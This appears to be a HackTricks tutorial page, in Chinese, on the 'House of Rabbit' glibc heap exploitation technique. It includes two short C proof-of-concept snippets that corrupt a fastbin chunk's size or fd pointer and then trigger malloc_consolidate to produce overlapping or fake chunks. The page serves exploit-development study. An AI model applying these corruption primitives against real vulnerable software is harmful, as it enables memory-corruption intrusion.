House of Rabbit

学习与实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习与实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 分享黑客技巧。

要求

能够修改快速 bin fd 指针或大小：这意味着您可以更改快速 bin 中一个块的前向指针或其大小。
能够触发 malloc_consolidate：这可以通过分配一个大块或合并顶部块来完成，这会强制堆合并块。

目标

创建重叠块：使一个块与另一个块重叠，从而允许进一步的堆操作。
伪造假块：欺骗分配器在堆操作期间将假块视为合法块。

攻击步骤

POC 1：修改快速 bin 块的大小

目标：通过操纵快速 bin 块的大小来创建重叠块。

步骤 1：分配块

unsigned long* chunk1 = malloc(0x40);  // Allocates a chunk of 0x40 bytes at 0x602000
unsigned long* chunk2 = malloc(0x40);  // Allocates another chunk of 0x40 bytes at 0x602050
malloc(0x10);                          // Allocates a small chunk to change the fastbin state

我们分配两个各为0x40字节的块。这些块在释放后将被放入快速空闲链表中。

步骤 2：释放块

free(chunk1);  // Frees the chunk at 0x602000
free(chunk2);  // Frees the chunk at 0x602050

我们释放这两个块，将它们添加到 fastbin 列表中。

步骤 3：修改块大小

chunk1[-1] = 0xa1;  // Modify the size of chunk1 to 0xa1 (stored just before the chunk at chunk1[-1])

我们将 chunk1 的大小元数据更改为 0xa1。这是一个关键步骤，用于在合并期间欺骗分配器。

步骤 4：触发 malloc_consolidate

malloc(0x1000);  // Allocate a large chunk to trigger heap consolidation

分配一个大块会触发 malloc_consolidate 函数，合并快速堆中的小块。被操控的 chunk1 的大小导致它与 chunk2 重叠。

合并后，chunk1 与 chunk2 重叠，从而允许进一步的利用。

POC 2: 修改 `fd` 指针

目标：通过操控快速堆 fd 指针创建一个假块。

步骤 1：分配块

unsigned long* chunk1 = malloc(0x40);  // Allocates a chunk of 0x40 bytes at 0x602000
unsigned long* chunk2 = malloc(0x100); // Allocates a chunk of 0x100 bytes at 0x602050

解释：我们分配两个块，一个较小和一个较大，以便为假块设置堆。

步骤 2：创建假块

chunk2[1] = 0x31;  // Fake chunk size 0x30
chunk2[7] = 0x21;  // Next fake chunk
chunk2[11] = 0x21; // Next-next fake chunk

我们将假块元数据写入 chunk2 以模拟较小的块。

步骤 3：释放 chunk1

free(chunk1);  // Frees the chunk at 0x602000

解释：我们释放 chunk1，将其添加到 fastbin 列表中。

步骤 4：修改 chunk1 的 fd

chunk1[0] = 0x602060;  // Modify the fd of chunk1 to point to the fake chunk within chunk2

解释：我们将 chunk1 的前向指针 (fd) 更改为指向 chunk2 内部的假块。

步骤 5：触发 malloc_consolidate

malloc(5000);  // Allocate a large chunk to trigger heap consolidation

分配一个大块再次触发 malloc_consolidate，它处理假块。

假块成为快速链表的一部分，使其成为进一步利用的合法块。

摘要

兔子之家 技术涉及修改快速链块的大小以创建重叠块或操纵 fd 指针以创建假块。这允许攻击者在堆中伪造合法块，从而启用各种形式的利用。理解和实践这些步骤将增强你的堆利用技能。

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 电报群组 或在 Twitter 🐦 @hacktricks_live** 上关注我们。**
通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享黑客技巧。

PreviousHouse of Orange NextHouse of Roman

Last updated 1 day ago

要求

目标

攻击步骤

POC 1：修改快速 bin 块的大小

POC 2: 修改 fd 指针

摘要

要求

目标

攻击步骤

POC 1：修改快速 bin 块的大小

POC 2: 修改 fd 指针

摘要

POC 2: 修改 `fd` 指针

POC 2: 修改 `fd` 指针